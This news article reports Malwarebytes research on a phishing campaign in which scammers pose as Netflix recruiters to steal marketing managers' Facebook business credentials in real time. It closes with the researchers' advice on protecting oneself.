Scammers posing as Netflix job recruiters are targeting social media and marketing managers in a new phishing campaign designed to co-opt those companies’ Facebook accounts. Here's what to look out for.
-
Phishing emails impersonating Netflix recruiters target marketing staff with fake high-level job offers.
-
The Netflix phishing sites trick victims into giving up their Facebook business account credentials in real time.
-
Hijacked accounts can be exploited to run malicious ads, demand ransom, or spread further scams.
New research by Malwarebytes says the scammers are sending out phishing emails to marketing employees, pretending to be Netflix job recruiters looking to fill lucrative positions at the streaming service company.
“The initial mail looks like what you might expect from a headhunter or a human resources (HR) recruitment specialist,” said Pieter Arntz, Malware Intelligence Researcher at Malwarebytes.
“I hope this note finds you well. Your reputation as a visionary marketing leader has caught our attention, and I’d like to share an extraordinary opportunity with you at Netflix,” the email states.
The email will praise the employee’s skill and leadership qualities, inviting them to apply for various high-profile jobs by scheduling “an interview with the ‘Netflix HR team.’”
Luring victims with lucrative job offers
These phishing campaigns are explicitly designed to steal the credentials of marketing managers, social media staff, and especially those who have access to company Facebook Pages or business accounts, the Malwarebytes research states.
Some of the job titles offered up in the phish: “Vice President of Marketing,” “Digital Marketing Manager,” and “Director of Social Media.”
Gaining access to a Facebook business account allows the bad actors to “run malicious ads using the company’s payment methods, demand a ransom for return of control over the account, or use the company’s reputation to spread more scams,” the research said.
Arntz said it looks as if the scammers have performed OSINT on their marks, offering senior career-level jobs that would seem appropriate for that particular job seeker to apply for.
Here’s how it works
Not surprisingly, if the job seeker clicks on the link provided in the email, they are taken to a fake Netflix website where they are asked to create a “Career Profile,” also giving them an option to link the profile to their Facebook account.
The fraudulent Netflix website designed by the hackers appears to be “a mix of content copied from the actual Netflix site and from the phishing campaign," Arntz said.
“At this stage, all red flags should go up,” Arntz says. Whether the job seeker chooses to complete their profile by clicking a “Continue with Facebook” or “Continue with Email” button, a new screen pops up asking the job seeker to sign in to their Facebook account.
“It’s very normal practice to offer the option of logging in with Facebook on third-party sites, so it would be understandable for the job seeker to click that link,” Arntz explains.
Once the victim enters their login information, they’ll automatically get a “The password you’ve entered is incorrect. Please try again!” prompt.
This Facebook login page proves the attack is “very sophisticated,” Arntz points out.
Using a websocket method to intercept credentials as they are being entered in real time, the scammers can “log into your real Facebook account within seconds,” he says.
“They could potentially ask for multi-factor authentication (MFA) confirmation if that’s necessary, too,“ Arntz added.
Furthermore, the malware researcher notes that because everything is happening live, the victim has no idea their Facebook account is being accessed.
This also gives the scammers time to do a number of things with the victim's account, such as “log you out, spam your friends, or whatever else they want,” he said.
How to protect yourself
Malwarebytes says there are a number of steps job seekers can take to protect themselves from these kinds of phishing attacks, including:
- Always be cautious engaging in job offers you have not applied for.
- Carefully check the website URL and email address for any typos or inconsistancies.
- Check if the address in the browser bar matches what you expect to see, along with the content of the website.
Malwarebytes also recommends that everyone learn how to spot and recognize phishing attempts, especially as cybercriminals increasingly use AI to help create phishing emails and fake websites.
Additionally, ensure internet browsers, software, and operating systems are kept up to date, and use real-time anti-malware solutions with web protection.
Those who think they might have been phished should “immediately change your passwords, enable multi-factor authentication, and notify your company’s IT/security team,” it said.
Malwarebytes said the phishing campaign itself was being hosted behind CloudFlare services. Both Netflix and CloudFlare have since been made aware of the findings.
Your email address will not be published. Required fields are markedmarked